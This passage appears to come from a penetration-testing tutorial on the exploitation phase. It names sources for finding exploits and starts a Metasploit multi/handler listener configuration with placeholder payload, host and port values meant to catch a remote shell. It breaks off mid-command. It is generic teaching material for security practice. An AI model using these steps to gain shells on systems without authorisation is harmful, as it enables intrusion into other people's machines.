Exploitation
The exploitation phase is accomplished by exploiting a vulnerability found on the target machine and getting a remote shell as well. That's it! Simple, right? Let's get started.
Finding exploits
Generally speaking, 99% of the time, the vulnerability scanner will tell you where to find the exploit in order to replicate it from your end. Here's where to find most of the exploits:
- Google it—it sounds simple, but it's my favorite method
Exploit-db
at http://www.exploit-db.com- The
searchsploit
tool in Kali Linux - Metasploit—use the
search
command to find it - Security Focus at http://www.securityfocus.com
- Sometimes you will find them on GitHub, at http://www.github.com
Listener setup
Before uploading and executing the payload, you will need to set up and execute a listener on Kali Linux.
To create a listener using Metasploit, enter the following:
use exploit/multi/handler set PAYLOAD [msfvenom Payload name] set LHOST [Kali IP address] set LPORT [Listening port on Kali] set ExitOnSession false...